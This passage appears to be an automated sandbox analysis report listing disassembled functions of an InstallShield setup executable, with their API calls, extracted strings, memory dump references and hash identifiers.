                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                            • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
                                                                                                                                                                            • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
                                                                                                                                                                            • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
                                                                                                                                                                            • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411F0F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$ErrorFreeLast$H_prolog3_$H_prolog3$Alloc
                                                                                                                                                                          • String ID: HsG$HsG$IS_OriginalLauncher:$IS_temp$auto$delayedstart:$extract_all:$installfromweb:$media_path:$no_engine$runfromtemp$tempdisk1folder:
                                                                                                                                                                          • API String ID: 3067009588-2352414546
                                                                                                                                                                          • Opcode ID: 323b9d9b09a83aa8488599d91544a8c6544a86d4cc267c65e5e0bfa600a66efa
                                                                                                                                                                          • Instruction ID: 40a748d07b6352d6f75fad17ff12695912deaa9e15f124b1e0a563052810ffee
                                                                                                                                                                          • Opcode Fuzzy Hash: 323b9d9b09a83aa8488599d91544a8c6544a86d4cc267c65e5e0bfa600a66efa
                                                                                                                                                                          • Instruction Fuzzy Hash: F5F19E30900258ADDF25EB60CC55BEEBB75AF15308F0441EEE1457B2D2CBB85E89CB66
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041A412, Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 270libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041A41C
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 0041A4A1
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000400,?,00000400), ref: 0041A580
                                                                                                                                                                            • Part of subcall function 004357B3: __EH_prolog3_GS.LIBCMT ref: 004357BD
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$AddressFileH_prolog3ModuleNameProc
                                                                                                                                                                          • String ID: Could not find entry point in ISSetup.dll$HsG$HsG$ISSetup.dll$IsMsiHelper.cpp$Launching InstallScript engine: %s, %s, %d$RunISMSISetup$setup.exe$w$xuG
                                                                                                                                                                          • API String ID: 1938318566-2889798997
                                                                                                                                                                          • Opcode ID: 27f1c0b959f0f8e5a56c188dd01a99c7aae753f179adc9a13a2f568f3f56e12f
                                                                                                                                                                          • Instruction ID: a000a53df8d3ca67d65d928d5410831d7b953353a9934217b74c1ec0e62e841d
                                                                                                                                                                          • Opcode Fuzzy Hash: 27f1c0b959f0f8e5a56c188dd01a99c7aae753f179adc9a13a2f568f3f56e12f
                                                                                                                                                                          • Instruction Fuzzy Hash: 33C18A70901218EEDB24DB64CD85BDDBBB0AF15304F1441EEE489A7292DBB85E84CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045CD79, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 138threadmemoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0045CD9D
                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 0045CDA4
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0045CDB4
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 0045CDC3
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0045CDCA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0045CDD0
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0045CE01
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0045CE16
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 0045CE35
                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000223,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0045CE5F
                                                                                                                                                                          • EqualSid.ADVAPI32(00000004,?), ref: 0045CE7A
                                                                                                                                                                          • FreeSid.ADVAPI32(?), ref: 0045CEA6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Token$ErrorLast$CurrentInformationOpenProcessThread$AllocateEqualFreeInitialize
                                                                                                                                                                          • String ID: +A
                                                                                                                                                                          • API String ID: 884311744-2476349683
                                                                                                                                                                          • Opcode ID: 95dc00f3ab7a107ad3b5007183d41f8750d13a454fb1fc3bb6a9622a3beecdd5
                                                                                                                                                                          • Instruction ID: cbbb2327e60659be4cf1e07f3a107eeb60f4773822a979e15780b7e30f4710a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 95dc00f3ab7a107ad3b5007183d41f8750d13a454fb1fc3bb6a9622a3beecdd5
                                                                                                                                                                          • Instruction Fuzzy Hash: 79419671900309AFDB109BA4DCC6BBFBBBDEF04345F10442AF901E2192D6399D498B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041DB58, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32 ref: 0041DB7E
                                                                                                                                                                          • GetWindowRect.USER32 ref: 0041DB86
                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0041DB90
                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0041DB95
                                                                                                                                                                          • SetRect.USER32 ref: 0041DBA0
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041DBD6
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0041DBDF
                                                                                                                                                                          • GetWindowRect.USER32 ref: 0041DBF5
                                                                                                                                                                          • IntersectRect.USER32 ref: 0041DC03
                                                                                                                                                                          • SubtractRect.USER32(?,?,?), ref: 0041DC1F
                                                                                                                                                                          • SetWindowPos.USER32(00000000,?,?,0000001E,00000000,00000000,00000005,0000001E), ref: 0041DC5F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: RectWindow$MetricsSystem$FindIntersectSubtract
                                                                                                                                                                          • String ID: F$Shell_TrayWnd
                                                                                                                                                                          • API String ID: 301737298-1447713892
                                                                                                                                                                          • Opcode ID: 478bf9cd35f2a5fdc500c1e927996768de91ef4aed08e38c5fe28f229c8db9f2
                                                                                                                                                                          • Instruction ID: 3c41205d294f757f3a50fd3c8671ab07fe2f87564d8069d4c880384eb5567a2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 478bf9cd35f2a5fdc500c1e927996768de91ef4aed08e38c5fe28f229c8db9f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C411D72900219AFDB10DFE9CE48ADFBBFDEB08300F110026E509B7150D674AA48CFA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458450, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045845A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateToolhelp32Snapshot,000002A8,00456B1E,0045932E,?,?,0000006C,0045932E,00457D82,?,?), ref: 00458472
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00458475
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,Process32First,?,0000006C,0045932E,00457D82,?,?), ref: 004584B0
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004584B3
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,Process32Next,?,0000006C,0045932E,00457D82,?,?), ref: 004584C9
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004584CC
                                                                                                                                                                          • _memset.LIBCMT ref: 004584F7
                                                                                                                                                                            • Part of subcall function 004585AD: __EH_prolog3_GS.LIBCMT ref: 004585B7
                                                                                                                                                                            • Part of subcall function 004585AD: GetModuleHandleW.KERNEL32(Ntdll.dll,NtQueryInformationProcess,?,00000400,?,000004A0,0045859B,00000000,?,0000006C,0045932E,00457D82,?,?), ref: 004585E7
                                                                                                                                                                            • Part of subcall function 004585AD: GetProcAddress.KERNEL32(00000000), ref: 004585EE
                                                                                                                                                                            • Part of subcall function 004585AD: OpenProcess.KERNEL32(00000400,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 0045861A
                                                                                                                                                                            • Part of subcall function 004585AD: _memset.LIBCMT ref: 0045863F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3__memset$OpenProcess
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Kernel32.dll$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                          • API String ID: 2047754285-1872946363
                                                                                                                                                                          • Opcode ID: 60d086c9987231e0b04b777859cfd3aa07f65e33080c40890218160be6523061
                                                                                                                                                                          • Instruction ID: ca85f0838a772cda133f435dcfaa2189bd9894703b40dc35e129fb731601113c
                                                                                                                                                                          • Opcode Fuzzy Hash: 60d086c9987231e0b04b777859cfd3aa07f65e33080c40890218160be6523061
                                                                                                                                                                          • Instruction Fuzzy Hash: A931427190021CAFDB10EBA0CC89BDD76789F04745F5001AFF509B6182EF789B498F59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004572D6, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 87registrylibraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 004572EB
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 004572FB
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000003,.Default\Control Panel\desktop\ResourceLocale,00000000,000F003F,?,?,00000000), ref: 00457334
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00483E18,00000000,00000000,?,CJ), ref: 0045734C
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000003,.DEFAULT\Control Panel\International,00000000,000F003F,?), ref: 0045736D
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,?,CJ), ref: 00457387
                                                                                                                                                                          • __wcstoi64.LIBCMT ref: 004573A9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: OpenQueryValue$AddressHandleModuleProc__wcstoi64
                                                                                                                                                                          • String ID: CJ$.DEFAULT\Control Panel\International$.Default\Control Panel\desktop\ResourceLocale$GetSystemDefaultUILanguage$Kernel32.dll$Locale
                                                                                                                                                                          • API String ID: 2065448255-2963820800
                                                                                                                                                                          • Opcode ID: e077b1d0d9a54c40e9d39e066671b9f74a15e5850532778cf3f665d039c01c16
                                                                                                                                                                          • Instruction ID: a6cedd30fc32830db7be2498ca46c71cafdf6415e567ca57eccb9b5212ba0925
                                                                                                                                                                          • Opcode Fuzzy Hash: e077b1d0d9a54c40e9d39e066671b9f74a15e5850532778cf3f665d039c01c16
                                                                                                                                                                          • Instruction Fuzzy Hash: 14217671E0021EBEDB11EF91DD41EBF77ACEB04B56F10043BAD05B2142DA649E49D7A8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00421C6D, Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 410windowstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004217C8: _memset.LIBCMT ref: 00421801
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000001), ref: 00421CE4
                                                                                                                                                                          • _memset.LIBCMT ref: 00421D0E
                                                                                                                                                                          • _memset.LIBCMT ref: 00421D25
                                                                                                                                                                            • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
                                                                                                                                                                            • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
                                                                                                                                                                            • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0041F4B2: __EH_prolog3_GS.LIBCMT ref: 0041F4B9
                                                                                                                                                                            • Part of subcall function 0041F4B2: __itow_s.LIBCMT ref: 0041F4F0
                                                                                                                                                                            • Part of subcall function 0041F4B2: SetLastError.KERNEL32(00000006,?,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F51F
                                                                                                                                                                            • Part of subcall function 0041F533: __EH_prolog3_GS.LIBCMT ref: 0041F53A
                                                                                                                                                                            • Part of subcall function 0041F533: __ltow_s.LIBCMT ref: 0041F572
                                                                                                                                                                            • Part of subcall function 0041F533: SetLastError.KERNEL32(00000008,00000000,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F5A1
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          • _memset.LIBCMT ref: 004221A7
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,00483E18,?,?), ref: 004221E0
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00422270
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last_memset$FreeMessageSendString$__itow_s__ltow_slstrcmpwsprintfwvsprintf
                                                                                                                                                                          • String ID: DownloadFiles: %s$DownloadFiles: downloading %s$HsG$^$msiaction.cpp$y
                                                                                                                                                                          • API String ID: 1474050675-2082572780
                                                                                                                                                                          • Opcode ID: 8960c283118b1bec289015494a74c56f957b5b89015b83932b1b8d3e9897acfc
                                                                                                                                                                          • Instruction ID: 5a5d13f6fdca0b8dab8671759087043df62c84359e7ddb997fc172de202d3d76
                                                                                                                                                                          • Opcode Fuzzy Hash: 8960c283118b1bec289015494a74c56f957b5b89015b83932b1b8d3e9897acfc
                                                                                                                                                                          • Instruction Fuzzy Hash: 60028E70A00228EFDB20EB65CD95BDDB7F4AF15304F5040EAE109A7191EB789B89CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042DF16, Relevance: 21.4, APIs: 1, Strings: 11, Instructions: 371COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042DF20
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: %s%d$.$HsG$InstanceId$Instances$PackageCode$ProductCode$ProductVersion$UpgradeCode$count$key
                                                                                                                                                                          • API String ID: 2608676048-2845829733
                                                                                                                                                                          • Opcode ID: a207a2c3fd5d68b72fb71a447eb78f2770c8b81ca98f9c14f0f6b156345f7440
                                                                                                                                                                          • Instruction ID: a3e08cd0b1a813b0d29dd8cc2e065337fc68d5d39633514d4d2796418e8dbc85
                                                                                                                                                                          • Opcode Fuzzy Hash: a207a2c3fd5d68b72fb71a447eb78f2770c8b81ca98f9c14f0f6b156345f7440
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF15971900229EADB14DBA1CC55BEDB778AF14308F5041EEE009B71D2EBB85B88CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042918A, Relevance: 21.4, APIs: 1, Strings: 11, Instructions: 350COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: AMD64$Checking package platform...$HsG$Intel64$Package is 32-bit$Package is 64-bit$Status returned from summary info: %d$Status returned obtaining PID_TEMPLATE property: %d$Template summary for current package: %s$msiaction.cpp$x64
                                                                                                                                                                          • API String ID: 2427045233-1482138839
                                                                                                                                                                          • Opcode ID: 8cd7c5742e3e27ef107730f7b0328c552dc376fc6e9e0a8f881b51b00c0bf63f
                                                                                                                                                                          • Instruction ID: b86fc842712ed1d66245e91ac34bd0663482a0b1c39bf07b98a38b607eda857d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd7c5742e3e27ef107730f7b0328c552dc376fc6e9e0a8f881b51b00c0bf63f
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE14F71900268EEEB21DBA4CC45BDDBBB8AF11304F5441EBE109B61D1D7B85E88CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040CC8A, Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 317COMMON
